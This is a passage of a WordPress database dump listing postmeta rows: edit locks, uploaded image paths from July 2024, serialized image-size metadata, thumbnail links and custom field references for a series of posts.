(612,211,'related',''),
(613,211,'_related','field_603b51c3e183e'),
(614,212,'_edit_lock','1722095063:1'),
(615,213,'_wp_attached_file','2024/07/8-2566-1.png'),
(616,213,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:20:\"2024/07/8-2566-1.png\";s:8:\"filesize\";i:1511353;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"8-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:125102;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"8-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1079672;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"8-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48074;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"8-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1191758;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"8-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:121938;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(618,212,'_thumbnail_id','213'),
(619,212,'_edit_last','1'),
(620,212,'title_style','default'),
(621,212,'_title_style','field_5d1a0217cf408'),
(622,212,'related',''),
(623,212,'_related','field_603b51c3e183e'),
(624,214,'title_style','default'),
(625,214,'_title_style','field_5d1a0217cf408'),
(626,214,'related',''),
(627,214,'_related','field_603b51c3e183e'),
(628,215,'_edit_lock','1722095094:1'),
(629,216,'_wp_attached_file','2024/07/9-2566-1.png'),
(630,216,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:20:\"2024/07/9-2566-1.png\";s:8:\"filesize\";i:1380727;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"9-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:115928;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"9-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:943551;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"9-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:45462;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"9-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1037151;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"9-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:117506;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(632,215,'_thumbnail_id','216'),
(633,215,'_edit_last','1'),
(635,215,'title_style','default'),
(636,215,'_title_style','field_5d1a0217cf408'),
(637,215,'related',''),
(638,215,'_related','field_603b51c3e183e'),
(639,217,'title_style','default'),
(640,217,'_title_style','field_5d1a0217cf408'),
(641,217,'related',''),
(642,217,'_related','field_603b51c3e183e'),
(643,218,'_edit_lock','1722095123:1'),
(644,219,'_wp_attached_file','2024/07/10-2566-1.png'),
(645,219,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:21:\"2024/07/10-2566-1.png\";s:8:\"filesize\";i:1325901;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"10-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119337;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"10-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:946343;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"10-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:49376;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"10-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1043477;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"10-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:133101;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(647,218,'_thumbnail_id','219'),
(648,218,'_edit_last','1'),
(650,218,'title_style','default'),
(651,218,'_title_style','field_5d1a0217cf408'),
(652,218,'related',''),
(653,218,'_related','field_603b51c3e183e'),
(654,220,'title_style','default'),
(655,220,'_title_style','field_5d1a0217cf408'),
(656,220,'related',''),
(657,220,'_related','field_603b51c3e183e'),
(658,221,'_edit_lock','1722095151:1'),
(659,222,'_wp_attached_file','2024/07/11-2566-1.png'),
(660,222,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:21:\"2024/07/11-2566-1.png\";s:8:\"filesize\";i:1483898;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"11-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:120859;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"11-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1019781;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"11-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47273;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"11-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1122719;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"11-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:112633;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(662,221,'_thumbnail_id','222'),
(663,221,'_edit_last','1'),
(664,221,'title_style','default'),
(665,221,'_title_style','field_5d1a0217cf408'),
(666,221,'related',''),
(667,221,'_related','field_603b51c3e183e'),
(668,223,'title_style','default'),
(669,223,'_title_style','field_5d1a0217cf408'),
(670,223,'related',''),
(671,223,'_related','field_603b51c3e183e'),
(672,224,'_edit_lock','1722095176:1'),
(673,225,'_wp_attached_file','2024/07/12-2566-1.png'),
(674,225,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:21:\"2024/07/12-2566-1.png\";s:8:\"filesize\";i:1269014;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"12-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:112997;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"12-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:945689;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"12-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47150;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"12-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1039656;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"12-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:114505;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(676,224,'_thumbnail_id','225'),
(677,224,'_edit_last','1'),
(678,224,'title_style','default'),
(679,224,'_title_style','field_5d1a0217cf408'),
(680,224,'related',''),
(681,224,'_related','field_603b51c3e183e'),
(682,226,'title_style','default'),
(683,226,'_title_style','field_5d1a0217cf408'),
(684,226,'related',''),
(685,226,'_related','field_603b51c3e183e'),
(686,227,'_edit_lock','1722095209:1'),
(687,228,'_wp_attached_file','2024/07/13-2566-1.png'),
(688,228,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:21:\"2024/07/13-2566-1.png\";s:8:\"filesize\";i:1205966;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"13-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119135;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"13-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:969591;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"13-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:49831;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"13-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1069733;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"13-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:134764;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(690,227,'_thumbnail_id','228'),
(691,227,'_edit_last','1'),
(692,227,'title_style','default'),
(693,227,'_title_style','field_5d1a0217cf408'),
(694,227,'related',''),
(695,227,'_related','field_603b51c3e183e'),
(696,229,'title_style','default'),
(697,229,'_title_style','field_5d1a0217cf408'),
(698,229,'related',''),
(699,229,'_related','field_603b51c3e183e'),
(700,230,'_edit_lock','1722095264:1'),
(701,231,'_wp_attached_file','2024/07/14-2566-1.png'),
(702,231,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:21:\"2024/07/14-2566-1.png\";s:8:\"filesize\";i:1136306;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"14-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:111879;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"14-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:874227;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"14-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41797;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"14-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:957101;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"14-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:91618;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(703,232,'_wp_attached_file','2024/07/14-2566-2.png'),
(704,232,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:21:\"2024/07/14-2566-2.png\";s:8:\"filesize\";i:1136306;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"14-2566-2-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:111879;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"14-2566-2-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:874227;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"14-2566-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41797;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"14-2566-2-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:957101;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"14-2566-2-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:91618;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(706,230,'_thumbnail_id','231'),
(707,230,'_edit_last','1'),
(708,230,'title_style','default'),
(709,230,'_title_style','field_5d1a0217cf408'),
(710,230,'related',''),
(711,230,'_related','field_603b51c3e183e'),
(712,233,'title_style','default'),
(713,233,'_title_style','field_5d1a0217cf408'),
(714,233,'related',''),
(715,233,'_related','field_603b51c3e183e'),
(716,234,'_edit_lock','1722095295:1'),
(717,235,'_wp_attached_file','2024/07/15-2566-1.png'),
(718,235,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:21:\"2024/07/15-2566-1.png\";s:8:\"filesize\";i:962256;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"15-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:98699;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"15-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:830701;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"15-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38871;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"15-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:917354;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"15-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:101619;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(720,234,'_thumbnail_id','235'),
(721,234,'_edit_last','1'),
(722,234,'title_style','default'),
(723,234,'_title_style','field_5d1a0217cf408'),
(724,234,'related',''),
(725,234,'_related','field_603b51c3e183e'),
(726,236,'title_style','default'),
(727,236,'_title_style','field_5d1a0217cf408'),
(728,236,'related',''),
(729,236,'_related','field_603b51c3e183e'),
(730,237,'_edit_lock','1722095327:1'),
(731,238,'_wp_attached_file','2024/07/16-2566-1.png'),
(732,238,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:21:\"2024/07/16-2566-1.png\";s:8:\"filesize\";i:1064091;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"16-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:110112;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"16-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:912982;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"16-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:39579;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"16-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1005797;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"16-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:84144;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(734,237,'_thumbnail_id','238'),
(735,237,'_edit_last','1'),
(736,237,'title_style','default'),
(737,237,'_title_style','field_5d1a0217cf408'),
(738,237,'related',''),
(739,237,'_related','field_603b51c3e183e'),
(740,239,'title_style','default'),
(741,239,'_title_style','field_5d1a0217cf408'),
(742,239,'related',''),
(743,239,'_related','field_603b51c3e183e'),
(744,240,'_edit_lock','1722095354:1'),
(745,241,'_wp_attached_file','2024/07/17-2566-1.png'),
(746,241,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:21:\"2024/07/17-2566-1.png\";s:8:\"filesize\";i:1325392;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"17-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:124407;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"17-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1021955;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"17-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51720;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"17-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1127612;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:21:\"17-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:137796;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(748,240,'_thumbnail_id','241'),
(749,240,'_edit_last','1'),
(751,240,'title_style','default'),
(752,240,'_title_style','field_5d1a0217cf408'),
(753,240,'related',''),
(754,240,'_related','field_603b51c3e183e'),
(755,242,'title_style','default'),
(756,242,'_title_style','field_5d1a0217cf408'),
(757,242,'related',''),
(758,242,'_related','field_603b51c3e183e'),
(760,244,'title_style','default'),
(761,244,'_title_style','field_5d1a0217cf408'),
(762,245,'_edit_lock','1722182890:1'),
(763,246,'_wp_attached_file','2024/07/154849.jpg'),
(764,246,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:18:\"2024/07/154849.jpg\";s:8:\"filesize\";i:139134;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"154849-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17349;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"154849-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123935;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"154849-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7883;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"154849-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79393;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"154849-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19970;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(765,247,'_wp_attached_file','2024/07/154850.jpg'),
(766,247,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:18:\"2024/07/154850.jpg\";s:8:\"filesize\";i:131534;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"154850-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16953;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"154850-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118259;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"154850-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7724;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"154850-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75748;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"154850-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19491;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(767,248,'_wp_attached_file','2024/07/154842.jpg'),
(768,249,'_wp_attached_file','2024/07/154845.jpg'),
